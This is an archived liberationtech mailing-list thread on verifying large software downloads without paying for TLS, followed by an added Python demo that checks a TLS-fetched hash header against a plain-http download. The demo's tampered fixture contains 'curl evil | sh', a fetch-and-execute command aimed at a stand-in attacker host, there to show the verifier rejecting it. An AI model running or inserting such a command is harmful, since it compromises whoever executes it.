[liberationtech] secure download tool - doesn't exist?!?

Owen Barton owen at civicactions.com
Mon Jul 1 11:43:33 PDT 2013


Not an existing tool, but...

There is an existing optional http header called Content-MD5 - if this was
more widely used (actually extending the http spec to include a
Content-Sha256 header would be better) by servers and browsers, that
could allow this. Browsers could then perform a secure validation by
performing a TLS HEAD request on the same URL. If the hash from the TLS
HEAD header matched the hash of the http downloaded content, the browser
could provide some sort of visual indicator to the user (that links to the
SSL cert info pop-up).

Right now, even if you do use TLS for downloads, most browsers don't
actually provide any indication that a valid cert was used (or a way to
easily check whose cert it was) like they do with the lock/highlighting for
regular pages - so this seems like it would be a UX improvement there also.

Thanks!
- Owen


On Mon, Jul 1, 2013 at 11:03 AM, adrelanos <adrelanos at riseup.net> wrote:

> In response to "the tool doesn't exist"...
>
> You can create a really great privacy preserving application, Open
> Source, but when you want to share it with the world, it's difficult to
> ensure, that users actually get legit versions.
>
> Goal:
>
> - big file downloads
> - at least as secure as TLS
> - at least as simple as a regular download using a browser
> - not using TLS itself (too expensive) for bulk download
>
> The problem:
>
> 1. Unauthenticated downloads can get infected with malware on the fly
> and we're living in a world where governments are interested in doing so
> or already doing it.
>
> 2. There are no free Open Source hosts providing TLS or any other kind
> of authentication usable by layman. (github doesn't provide downloads
> anymore, sourceforge "only" offers unlimited free http downloads, no TLS.)
>
> 3. TLS downloads are expensive. I am creating Free Software myself
> already (Whonix), but I am not willing to pay hundreds of dollars every
> month for TLS downloads and many other producers of Free Software aren't
> willing to do that either. That's just the reality.
>
> 4. Gpg verification - almost no one uses it. Technically, it works okay,
> you can share your OpenPGP public key over TLS (web traffic isn't the
> most expensive thing, downloads are) or even web of trust (non-anonymous
> people) and it can verify builds. Since only one in twenty persons (or
> worse) uses it for verification, for whatever reasons, it's not the
> solution.
>
> 5. Windows doesn't even have a package manager like Debian has apt-get.
> (Sorry, I am ignorant about Windows 8 and its app store thingy and not
> sure if FOSS developers can easily add their software.)
>
> 6. Linux distributions, such as Debian, have awesome updating systems
> (Debian has apt-get, which even defeats The Update Framework threat
> model [1]); other distributions may have similar great updaters.
>
> Problem: it's far from easy to get software into the repository, you need
> to create packages following their policy, need to be a Debian developer
> or need a sponsor, that's absolutely non-trivial, many projects just
> failed or have given up (example: Retroshare).
>
> Usually their repository is filled up with high quality packages. Just
> many projects/newer projects not capable/compatible/etc. with that end
> up using less secure methods to share their software. There is nothing
> in the middle such as a PPA service. (Ubuntu has a PPA service, but
> Ubuntu should be avoided for other privacy issues [2].)
>
> 7. Metalink could solve it, if there were metalink downloaders
> supporting OpenPGP, but there aren't any.
>
> 8. Mainstream browsers don't come with Metalink/OpenPGP support out of
> the box, so you'd still have to tell users "you have to download tool X
> to download our tool Y".
>
> In conclusion:
>
> I don't think we need a gpg4win downloader, a TBB downloader, Tails
> downloader, a Whonix downloader... That's just a lot of duplicate effort and
> another bootstrap issue: how to share the download tool itself? Make it
> small and share it over TLS?
>
> I think, this kind of tool doesn't exist yet.
>
> References:
>
> [1] https://www.updateframework.com/wiki/Docs/Security#AttacksandWeaknesses
> [2] https://www.eff.org/deeplinks/2012/10/privacy-ubuntu-1210-amazon-ads-and-data-leaks
>



-- 
Owen Barton, CivicActions, Inc.
cell: 805-699-6099, skype/irc: grugnog
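The check Owen sketches above, as an added illustration that is not part of the original thread: the client fetches only the headers over TLS, downloads the bulk body over plain http, and accepts the file only when the digest advertised in the authenticated HEAD response matches the digest of what actually arrived. Content-MD5 is a real, optional header (RFC 1864, base64 of the raw MD5 digest); the Content-SHA256 header, its base64 encoding, and the two "server" stubs standing in for the TLS and http channels are assumptions made for this example. Because MD5 is not collision resistant, the verifier refuses to rely on it unless the caller explicitly opts in.

```python
import base64
import hashlib
import hmac

# Content-MD5 exists (RFC 1864). Content-SHA256 is hypothetical here, and we
# assume it would carry the digest base64-encoded, like Content-MD5 does.
MD5_HEADER = "content-md5"
SHA256_HEADER = "content-sha256"

# --- constructed "server" with a legitimate file and one tampered copy -------
LEGIT_BODY = b"#!/bin/sh\necho 'installing privacy tool'\n"
TAMPERED_BODY = b"#!/bin/sh\necho 'installing privacy tool'\ncurl evil | sh\n"


def build_head_headers(body, algos=("sha256", "md5")):
    """What an honest origin would put in the HEAD response for `body`."""
    headers = {}
    if "sha256" in algos:
        headers["Content-SHA256"] = base64.b64encode(hashlib.sha256(body).digest()).decode()
    if "md5" in algos:
        headers["Content-MD5"] = base64.b64encode(hashlib.md5(body).digest()).decode()
    return headers


def tls_head(url):
    """Stand-in for a HEAD request over TLS: headers come from the real origin,
    so an on-path attacker on the http leg cannot change them."""
    return build_head_headers(LEGIT_BODY)


def http_get(url, attacker_on_path=False):
    """Stand-in for the plain http bulk download, optionally modified in flight."""
    return TAMPERED_BODY if attacker_on_path else LEGIT_BODY


# --- client-side verification ------------------------------------------------
def expected_digests(head_headers):
    """Map algorithm name -> raw digest bytes advertised by the HEAD response."""
    lowered = {k.lower(): v for k, v in head_headers.items()}
    out = {}
    if SHA256_HEADER in lowered:
        out["sha256"] = base64.b64decode(lowered[SHA256_HEADER])
    if MD5_HEADER in lowered:
        out["md5"] = base64.b64decode(lowered[MD5_HEADER])
    return out


def verify_download(head_headers, body, allow_md5=False):
    """Return (accepted, algorithm_used_or_reason).

    Prefers SHA-256. MD5 is only consulted when the caller opts in, since a
    collision-resistant hash is what makes the scheme as strong as TLS."""
    digests = expected_digests(head_headers)
    if "sha256" in digests:
        actual = hashlib.sha256(body).digest()
        return hmac.compare_digest(actual, digests["sha256"]), "sha256"
    if "md5" in digests:
        if not allow_md5:
            return False, "only Content-MD5 offered; MD5 not accepted"
        actual = hashlib.md5(body).digest()
        return hmac.compare_digest(actual, digests["md5"]), "md5"
    return False, "no digest header in authenticated HEAD response"


def secure_download(url, attacker_on_path=False, allow_md5=False):
    """The full flow a browser would run: TLS HEAD, http GET, compare."""
    headers = tls_head(url)
    body = http_get(url, attacker_on_path=attacker_on_path)
    ok, why = verify_download(headers, body, allow_md5=allow_md5)
    return ok, why, body


if __name__ == "__main__":
    for tampered in (False, True):
        ok, why, _ = secure_download("http://example.invalid/tool.sh", tampered)
        print(f"attacker_on_path={tampered}: accepted={ok} ({why})")
```

The comparison uses hmac.compare_digest rather than == so the verifier's timing does not depend on where two digests first differ; the decisive property, though, is that the digest arrives over a channel the attacker on the http leg cannot write to.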